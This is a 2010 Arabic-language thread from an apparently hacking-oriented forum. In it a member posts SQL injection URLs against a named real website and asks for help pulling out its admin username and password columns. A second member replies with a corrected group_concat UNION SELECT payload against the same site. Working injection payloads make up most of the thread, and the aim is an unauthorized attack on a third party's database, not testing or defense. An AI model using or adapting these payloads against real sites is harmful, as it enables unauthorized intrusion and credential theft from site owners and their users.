التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 05-02-2010, 05:55 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو






مستر داتا بيز غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
مستر داتا بيز is on a distinguished road

افتراضي غير مجاب: مساعده فى ان عمود اليوزر يعطينى خطاء سبحان الله مع انه صحيح بعد التخمين


السلام عليكم
اخوانى الكرام

انا جيبت موقع فيه ثغره وطبقت عليها دروس الاخ فولكانو وانا انتظرك بنفسك يا فولكانو ترد عليا الله يكرمك لانى صراحة فى كلاب صعرانه بتجرى فى دماغى دلوقت LOL
المهم اخى انا لا اطيل عليك

الموقع اهو

كود PHP:
http://ismythesishotornot.com/index.php?id=-802 union select 1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5+from+information_schema.columns+where+column_name+like+CHAR(37, 112, 97, 115, 115, 37)-- 
وانا يا اخى عملت الى انت قولت عليه طلعلى عمود الادمن والباس وقاعدة البيانات بالشكل ده
user:Password:mysql
طبعا القاعده الاصدار الخامس وما نسيت امر version()
المهم الان المفروض ان
user
هوا عمود الادمن بعد الكود الى حضرتك شايفه ده
وعمود الباس الي هوا
password
و mysql الى هوا جدول السيغما
طيب الان انظر اخى
جيت اشفر ال عمود User
زي ما حضرتك قولت فى الدرس وادي التشفير اهو
0x75736572
حطيت الامر ده زي ما انت قولت
where+table_name=0x75736572--
طلعلى عمود الاسماء باسم Host
ودي الى طلعت بالضبط
user:Host:mysql
وادى الكود كاملا عشان تشوفه برضه مع العلم العمود المصاب فى هذا الموقع عمود رقم ثلاثه فقط
كود PHP:
http://ismythesishotornot.com/index.php?id=-802 union select 1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5+from+information_schema.columns+where+table_name=0x75736572-- 
المفروض بقى انى هحط التجهيزه بتاعتى بالطريقه دي حسب شرح حضرتك بناء على انى استعلمت على التيبل نيم الى هوا اسم الجدول واليوزر نيم الى هوا اسم المستخدم والباسورد الى هوا مشفر زي ما علمتنا
يعنى هيبقى كده
concat(table_name,0x3a,column_name,0x3a,table_sche ma)
بعد التعديل هيبقى كده
concat(Host,0x3a,Pass)
للعلم طلع معاي الجدول باسم password
وجربتها ايضا
الان لما اجي اعمل Execute من الهاك بار
يقولى
Looks like we had an error. Please check back later.
يعنى فيه خطاء مع العلم ان كل حقنتى صح وانا راجعتها الف مره بس ممكن يكون فى حاجه انت شايفها وانا مش واخد بالى منها سبحان الله جت ع الخطوة الاخيرة وضربت خالص ياريت اخى توضحلى ايه المشكله بالضبط

تحياتى وانتظر الرد


Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC lshu]i tn hk ul,] hgd,.v du'dkn o'hx sfphk hggi lu hki wpdp fu] hgjoldk

   

رد مع اقتباس
قديم 05-02-2010, 08:38 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية abdolkadr
 

 

 
إحصائية العضو







abdolkadr غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
abdolkadr is on a distinguished road

افتراضي


السلام عليكم اسمح لي ارد اخي
المسألة بسيطة
وهل تضن ان عمود اليوزر يمكن ان يكون اسمه host استظافة
الهوست ليس اسم اليوزر
لذلك استخدم الامر group
قبل concat
group_concat(table_name,0x3a,column_name,0x3a,tabl e_schema)
الخلاصة


كود:
http://ismythesishotornot.com/index.php?id=-802 union select 1,2,group_concat(table_name,0x3a,column_name,0x3a,table_schema),4,5+from+information_schema.columns+where+table_name=0x75736572--
و على الاغلب عمود اليوزر هو User
السلام عليكم

   

رد مع اقتباس
قديم 05-02-2010, 10:00 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
إحصائية العضو






مستر داتا بيز غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
مستر داتا بيز is on a distinguished road

افتراضي


تسلم يا الغالى جارى التجربه والله انك محترف واستاذى


تسلم ربى يعزك ساكمل ان شاء الله ولي عودة بالنتيجه بأذن الله

   

رد مع اقتباس
قديم 05-02-2010, 10:20 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو






مستر داتا بيز غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
مستر داتا بيز is on a distinguished road

افتراضي


للاسف اخى عبد القادر ما ظبط معي ايه المشكلة يا شباب ارجوكم

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
مشكـل مع موقع ثـاني طلع لي الباس و اليوزر و كل شيء صحيح لكـن ... Mr-MoncéFiix جـــ'ابات العناكــ'ب 2 08-23-2010 02:04 PM
سبحان الله طلعت الباسورد واليوزر غلط عملت كل الى فى الدرس برضه غلط حد يرد عليا اكرمكم الله مستر داتا بيز جـــ'ابات العناكــ'ب 3 05-05-2010 05:27 AM
استخراج عمود اليوزر في ها الموقع ..... والله جنني فهههد جـــ'ابات العناكــ'ب 4 05-01-2010 02:41 AM
[درس] : سبحان الله وبحمده سبحان الله العظيم xman2 قســم تطويــر المــــواقع 0 09-22-2009 11:20 PM


الساعة الآن 01:41 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0